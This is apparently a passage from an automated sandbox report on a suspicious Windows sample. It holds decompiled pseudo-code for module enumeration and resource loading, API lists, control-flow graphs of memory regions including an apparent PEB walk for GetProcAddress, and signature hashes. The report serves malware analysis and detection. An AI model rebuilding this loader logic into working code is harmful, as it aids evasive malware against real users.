                                                                                                                                                                                                          												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                          												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                          												__eflags = _t413;
                                                                                                                                                                                                          												if(_t413 != 0) {
                                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                          												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                          												__eflags = _t415;
                                                                                                                                                                                                          												if(_t415 != 0) {
                                                                                                                                                                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                          									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										_push(_t379);
                                                                                                                                                                                                          										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                          										_t563 = _t563 + 4;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                          							__eflags = _t369;
                                                                                                                                                                                                          							if(_t369 != 0) {
                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                          							__eflags = _t370;
                                                                                                                                                                                                          							if(_t370 != 0) {
                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L80;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                          						_t565 = _t557 + 8;
                                                                                                                                                                                                          						_t547 = _t428;
                                                                                                                                                                                                          						_t520 = _t565 + 0x298;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t429 =  *_t520;
                                                                                                                                                                                                          							if(_t429 !=  *_t547) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_t429 == 0) {
                                                                                                                                                                                                          								L7:
                                                                                                                                                                                                          								_t429 = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                          								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t520 = _t520 + 2;
                                                                                                                                                                                                          									_t547 = _t547 + 2;
                                                                                                                                                                                                          									if(_t493 != 0) {
                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L7;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							if(_t429 != 0) {
                                                                                                                                                                                                          								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                          								_t557 = _t565 + 8;
                                                                                                                                                                                                          								_t548 = _t431;
                                                                                                                                                                                                          								_t488 = _t557 + 0x298;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									_t432 =  *_t488;
                                                                                                                                                                                                          									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                          									if(_t432 !=  *_t548) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                          										_t432 = 0;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                          										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                          										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t488 = _t488 + 2;
                                                                                                                                                                                                          											_t548 = _t548 + 2;
                                                                                                                                                                                                          											__eflags = _t432;
                                                                                                                                                                                                          											if(_t432 != 0) {
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L16;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                          									__eflags = _t432;
                                                                                                                                                                                                          									if(_t432 == 0) {
                                                                                                                                                                                                          										goto L10;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                          										__eflags = _t435;
                                                                                                                                                                                                          										if(_t435 != 0) {
                                                                                                                                                                                                          											do {
                                                                                                                                                                                                          												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                          												_t566 = _t557 + 8;
                                                                                                                                                                                                          												_t549 = _t437;
                                                                                                                                                                                                          												_t490 = _t566 + 0x298;
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													_t438 =  *_t490;
                                                                                                                                                                                                          													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                          													if(_t438 !=  *_t549) {
                                                                                                                                                                                                          														break;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                                          														L26:
                                                                                                                                                                                                          														_t438 = 0;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                          														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                          														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                          															break;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t490 = _t490 + 2;
                                                                                                                                                                                                          															_t549 = _t549 + 2;
                                                                                                                                                                                                          															__eflags = _t438;
                                                                                                                                                                                                          															if(_t438 != 0) {
                                                                                                                                                                                                          																continue;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L26;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L28:
                                                                                                                                                                                                          													__eflags = _t438;
                                                                                                                                                                                                          													if(_t438 == 0) {
                                                                                                                                                                                                          														goto L10;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                          														_t557 = _t566 + 8;
                                                                                                                                                                                                          														_t550 = _t439;
                                                                                                                                                                                                          														_t492 = _t557 + 0x298;
                                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                                          															_t440 =  *_t492;
                                                                                                                                                                                                          															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                          															if(_t440 !=  *_t550) {
                                                                                                                                                                                                          																break;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                                          																L34:
                                                                                                                                                                                                          																_t440 = 0;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                          																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                          																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                          																	break;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t492 = _t492 + 2;
                                                                                                                                                                                                          																	_t550 = _t550 + 2;
                                                                                                                                                                                                          																	__eflags = _t440;
                                                                                                                                                                                                          																	if(_t440 != 0) {
                                                                                                                                                                                                          																		continue;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		goto L34;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															L36:
                                                                                                                                                                                                          															__eflags = _t440;
                                                                                                                                                                                                          															if(_t440 == 0) {
                                                                                                                                                                                                          																goto L10;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																goto L37;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															goto L81;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														asm("sbb eax, eax");
                                                                                                                                                                                                          														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          														goto L36;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L81;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												asm("sbb eax, eax");
                                                                                                                                                                                                          												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          												goto L28;
                                                                                                                                                                                                          												L37:
                                                                                                                                                                                                          												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                          												__eflags = _t442;
                                                                                                                                                                                                          											} while (_t442 != 0);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L38;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                          								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								CloseHandle(_t525);
                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L81;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						asm("sbb eax, eax");
                                                                                                                                                                                                          						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L81:
                                                                                                                                                                                                          			}

































































































                                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                                          0x00401ec6
                                                                                                                                                                                                          0x00401ecb
                                                                                                                                                                                                          0x00401ece
                                                                                                                                                                                                          0x00401ed2
                                                                                                                                                                                                          0x00401ed4
                                                                                                                                                                                                          0x00401eef
                                                                                                                                                                                                          0x00401ed6
                                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                                          0x00401ee2
                                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                                          0x00401ef7
                                                                                                                                                                                                          0x00401efc
                                                                                                                                                                                                          0x00401f02
                                                                                                                                                                                                          0x00401f08
                                                                                                                                                                                                          0x00401f0c
                                                                                                                                                                                                          0x00401f15
                                                                                                                                                                                                          0x00401f18
                                                                                                                                                                                                          0x00401f1a
                                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                                          0x00401f2f
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f40
                                                                                                                                                                                                          0x00401f45
                                                                                                                                                                                                          0x00401f4a
                                                                                                                                                                                                          0x00401f4b
                                                                                                                                                                                                          0x00401f50
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                                          0x00401f69
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f73
                                                                                                                                                                                                          0x00401f75
                                                                                                                                                                                                          0x00401f7b
                                                                                                                                                                                                          0x00401f80
                                                                                                                                                                                                          0x00401f81
                                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                                          0x00401f8c
                                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                                          0x00401f9d
                                                                                                                                                                                                          0x00401fa2
                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                          0x00401fac
                                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                                          0x00401fb6
                                                                                                                                                                                                          0x00401fbf
                                                                                                                                                                                                          0x00401fc4
                                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                                          0x00401fce
                                                                                                                                                                                                          0x00401fd3
                                                                                                                                                                                                          0x00401fe0
                                                                                                                                                                                                          0x00401fec
                                                                                                                                                                                                          0x00401ffe
                                                                                                                                                                                                          0x00402001
                                                                                                                                                                                                          0x00402006
                                                                                                                                                                                                          0x0040200b
                                                                                                                                                                                                          0x00402010
                                                                                                                                                                                                          0x00402015
                                                                                                                                                                                                          0x0040201a
                                                                                                                                                                                                          0x0040201f
                                                                                                                                                                                                          0x00402024
                                                                                                                                                                                                          0x00402029
                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                          0x00402033
                                                                                                                                                                                                          0x00402038
                                                                                                                                                                                                          0x0040203d
                                                                                                                                                                                                          0x00402042
                                                                                                                                                                                                          0x00402047
                                                                                                                                                                                                          0x0040204c
                                                                                                                                                                                                          0x00402051
                                                                                                                                                                                                          0x00402056
                                                                                                                                                                                                          0x0040205b
                                                                                                                                                                                                          0x00402060
                                                                                                                                                                                                          0x00402065
                                                                                                                                                                                                          0x0040206a
                                                                                                                                                                                                          0x0040206f
                                                                                                                                                                                                          0x00402074
                                                                                                                                                                                                          0x00402079
                                                                                                                                                                                                          0x0040207e
                                                                                                                                                                                                          0x00402083
                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                          0x0040208d
                                                                                                                                                                                                          0x00402092
                                                                                                                                                                                                          0x00402097
                                                                                                                                                                                                          0x0040209c
                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                          0x004020a5
                                                                                                                                                                                                          0x004020aa
                                                                                                                                                                                                          0x004020ae
                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                          0x004020b6
                                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                                          0x004020c0
                                                                                                                                                                                                          0x004020c5
                                                                                                                                                                                                          0x004020ca
                                                                                                                                                                                                          0x004020cf
                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                          0x004020e1
                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                          0x004020eb
                                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                                          0x004020f5
                                                                                                                                                                                                          0x004020fa
                                                                                                                                                                                                          0x004020ff
                                                                                                                                                                                                          0x00402104
                                                                                                                                                                                                          0x00402109
                                                                                                                                                                                                          0x0040210e
                                                                                                                                                                                                          0x00402113
                                                                                                                                                                                                          0x00402118
                                                                                                                                                                                                          0x0040211d
                                                                                                                                                                                                          0x00402122
                                                                                                                                                                                                          0x00402127
                                                                                                                                                                                                          0x0040212c
                                                                                                                                                                                                          0x00402131
                                                                                                                                                                                                          0x00402136
                                                                                                                                                                                                          0x00401c88
                                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                                          0x00401c98
                                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                                          0x00401cbd
                                                                                                                                                                                                          0x00401cc2
                                                                                                                                                                                                          0x00401cc5
                                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                                          0x00401cd2
                                                                                                                                                                                                          0x00401cd4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                                          0x00401cd8
                                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                          0x00401ce5
                                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cf9
                                                                                                                                                                                                          0x00401d02
                                                                                                                                                                                                          0x00401d07
                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                                          0x00401d1d
                                                                                                                                                                                                          0x00401d22
                                                                                                                                                                                                          0x00401d25
                                                                                                                                                                                                          0x00401d27
                                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                                          0x00401d32
                                                                                                                                                                                                          0x00401d34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d36
                                                                                                                                                                                                          0x00401d38
                                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                                          0x00401d3d
                                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                                          0x00401d45
                                                                                                                                                                                                          0x00401d48
                                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d5d
                                                                                                                                                                                                          0x00401d6a
                                                                                                                                                                                                          0x00401d6f
                                                                                                                                                                                                          0x00401d72
                                                                                                                                                                                                          0x00401d74
                                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                                          0x00401d82
                                                                                                                                                                                                          0x00401d84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d86
                                                                                                                                                                                                          0x00401d88
                                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                                          0x00401d8d
                                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                                          0x00401d95
                                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                                          0x00401da0
                                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                                          0x00401d50
                                                                                                                                                                                                          0x00401d52

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPNs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                          • API String ID: 2366190142-1649027716
                                                                                                                                                                                                          • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 268 2cb092b-2cb0970 GetPEB 269 2cb0972-2cb0978 268->269 270 2cb097a-2cb098a call 2cb0d35 269->270 271 2cb098c-2cb098e 269->271 270->271 276 2cb0992-2cb0994 270->276 271->269 273 2cb0990 271->273 275 2cb0996-2cb0998 273->275 277 2cb0a3b-2cb0a3e 275->277 276->275 278 2cb099d-2cb09d3 276->278 279 2cb09dc-2cb09ee call 2cb0d0c 278->279 282 2cb09f0-2cb0a3a 279->282 283 2cb09d5-2cb09d8 279->283 282->277 283->279
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                          • Instruction ID: bffe2ac2521a5dc990838b2244e8e02abd88255132c7227f2296f97c8e86be94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D83138B6900619DFDB11CF99C880AEEBBF9FF48324F15414AD841A7250D771EA45CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 285 3050490-30504d9 290 30504e5-30504e8 285->290 291 30504db-30504dd 285->291 292 30507f3-3050874 290->292 294 30504ee-305053c 290->294 291->292 293 30504e3 291->293 293->294 303 30505ae-3050618 294->303 304 305053e-3050570 294->304 323 3050631 303->323 324 305061a-305062f 303->324 313 3050572-3050574 304->313 314 305057c-305057f 304->314 313->292 316 305057a 313->316 314->292 315 3050585-30505a8 314->315 315->303 316->315 325 3050639 323->325 327 3050644-305065a 324->327 325->327 330 3050660-3050674 327->330 331 30506fd-3050719 327->331 334 3050676-305068c 330->334 335 30506ec-30506f0 330->335 339 3050790-30507c1 331->339 340 305071b-3050726 331->340 334->331 341 305068e-305069f LdrInitializeThunk 334->341 335->330 337 30506f6 335->337 337->331 354 30507eb-30507f2 339->354 345 3050750-3050788 340->345 346 3050728-305074e 340->346 344 30506a5-30506b4 341->344 352 30506e4-30506e8 344->352 353 30506b6-30506e2 344->353 361 305078e 345->361 346->345 352->341 355 30506ea 352->355 353->331 355->331 361->354
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: {o^
                                                                                                                                                                                                          • API String ID: 2994545307-4057684116
                                                                                                                                                                                                          • Opcode ID: e2d2f20b090b0bbcc28c0798c032b55b011bbfdd12cf0a1399582881b0c1b4a1
                                                                                                                                                                                                          • Instruction ID: a2d765004d80ce2e10640f1643fcf5741005b554cb9f04c363744efdeb7bfacb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d2f20b090b0bbcc28c0798c032b55b011bbfdd12cf0a1399582881b0c1b4a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B117387115008FC754DF29D998A2ABBE6FF88714B2585A9F906CB3B1DB31EC45CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
